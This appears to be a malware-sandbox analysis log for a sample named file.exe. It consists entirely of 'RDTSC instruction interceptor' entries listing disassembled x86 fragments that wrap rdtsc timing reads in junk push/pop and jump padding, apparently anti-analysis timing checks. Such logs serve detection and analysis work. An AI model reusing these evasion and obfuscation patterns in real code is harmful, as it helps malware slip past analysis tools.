Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F3CB second address: 72F3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F3D0 second address: 7130B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c clc 0x0000000d call dword ptr [ebp+1244BFAEh] 0x00000013 pushad 0x00000014 pushad 0x00000015 ja 00007F36ED361E06h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772B7A second address: 772B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772CE9 second address: 772CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772E4D second address: 772E53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772E53 second address: 772E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772FCE second address: 772FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 775625 second address: 775629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F15 second address: 777F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D0h 0x00000009 jnl 00007F36EC8543C6h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F36EC8543D6h 0x00000019 jmp 00007F36EC8543D8h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F61 second address: 777F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F67 second address: 777F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F6B second address: 777FBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E17h 0x00000007 jo 00007F36ED361E06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F36ED361E14h 0x00000016 jmp 00007F36ED361E19h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778242 second address: 77824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77824D second address: 778251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4A9 second address: 77C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F36EC8543C6h 0x0000000c jc 00007F36EC8543C6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4C2 second address: 77C4C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C912 second address: 77C922 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36EC8543C6h 0x00000008 jg 00007F36EC8543C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA8A second address: 77CA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA94 second address: 77CA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA98 second address: 77CAAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAAA second address: 77CAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAB1 second address: 77CAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAB7 second address: 77CABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77FD41 second address: 77FD55 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F36ED361E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77FD55 second address: 77FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F617 second address: 77F644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E11h 0x00000009 pop ebx 0x0000000a jmp 00007F36ED361E17h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F644 second address: 77F649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F79B second address: 77F79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F79F second address: 77F7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F36EC8543D1h 0x0000000c jbe 00007F36EC8543C6h 0x00000012 pop esi 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F7C1 second address: 77F7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F36ED361E16h 0x0000000c push eax 0x0000000d jnc 00007F36ED361E06h 0x00000013 jno 00007F36ED361E06h 0x00000019 pop eax 0x0000001a jng 00007F36ED361E0Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787511 second address: 787552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CDh 0x00000007 je 00007F36EC8543EAh 0x0000000d jmp 00007F36EC8543D6h 0x00000012 jmp 00007F36EC8543CEh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787552 second address: 787563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787563 second address: 78756D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36EC8543C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7862D8 second address: 7862DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7865F9 second address: 7865FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7865FF second address: 786603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786603 second address: 786607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786607 second address: 786619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786619 second address: 786625 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F36EC8543CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ED7E second address: 72ED94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ED94 second address: 72EDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 nop 0x00000007 ja 00007F36EC8543CCh 0x0000000d mov ebx, dword ptr [ebp+1247FE22h] 0x00000013 mov ecx, esi 0x00000015 add eax, ebx 0x00000017 mov ch, dh 0x00000019 push eax 0x0000001a jnp 00007F36EC8543D4h 0x00000020 push eax 0x00000021 push edx 0x00000022 jg 00007F36EC8543C6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72EDC2 second address: 72EE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F36ED361E08h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add ch, 00000051h 0x00000026 mov edi, 149A1DF1h 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F36ED361E08h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push ecx 0x00000048 adc di, D820h 0x0000004d pop edx 0x0000004e nop 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78676A second address: 786782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786782 second address: 786786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78724F second address: 787255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787255 second address: 787278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F36ED361E10h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F36ED361E0Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C59E second address: 78C5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C5A5 second address: 78C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C5AE second address: 78C5CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C751 second address: 78C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C756 second address: 78C75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C75C second address: 78C760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78CA16 second address: 78CA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D25D second address: 78D262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D508 second address: 78D513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D513 second address: 78D519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D519 second address: 78D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D51E second address: 78D525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DAB4 second address: 78DB09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D4h 0x00000008 jmp 00007F36EC8543D6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007F36EC8543E6h 0x0000001a push edi 0x0000001b jmp 00007F36EC8543CEh 0x00000020 pop edi 0x00000021 pushad 0x00000022 jng 00007F36EC8543C6h 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDEC second address: 78DDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F36ED361E0Ch 0x0000000b jo 00007F36ED361E06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDFD second address: 78DE02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DE02 second address: 78DE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796288 second address: 79628C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79628C second address: 7962B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F36ED361E0Eh 0x00000012 jnl 00007F36ED361E06h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F36ED361E06h 0x00000022 ja 00007F36ED361E06h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7962B4 second address: 7962B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7965C7 second address: 7965CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796715 second address: 796720 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796720 second address: 79672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79672A second address: 79673D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F36EC8543C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F36EC8543C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79673D second address: 796741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796741 second address: 796758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F36EC8543CCh 0x0000000c jg 00007F36EC8543C6h 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7969C8 second address: 7969D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36ED361E12h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7969D4 second address: 7969DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7969DA second address: 796A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jbe 00007F36ED361E06h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 popad 0x00000013 push esi 0x00000014 pushad 0x00000015 jnc 00007F36ED361E06h 0x0000001b jmp 00007F36ED361E0Eh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796A07 second address: 796A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796C8A second address: 796C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796DE4 second address: 796DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796DE8 second address: 796E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F36ED361E0Ah 0x00000011 popad 0x00000012 jo 00007F36ED361E1Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796E0B second address: 796E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D2B5 second address: 79D2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F36ED361E11h 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D3FE second address: 79D40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F36EC8543CAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D40F second address: 79D413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D413 second address: 79D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36EC8543CDh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D429 second address: 79D431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8AB second address: 79D8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8B1 second address: 79D8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36ED361E0Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA35 second address: 79DA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F36EC8543C6h 0x0000000d jmp 00007F36EC8543D5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA59 second address: 79DA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 js 00007F36ED361E06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA69 second address: 79DA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DD69 second address: 79DD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DEC0 second address: 79DEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DEC4 second address: 79DECE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E02F second address: 79E033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E033 second address: 79E054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E17h 0x00000007 jno 00007F36ED361E06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E054 second address: 79E063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007F36EC8543C6h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EF93 second address: 79EF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
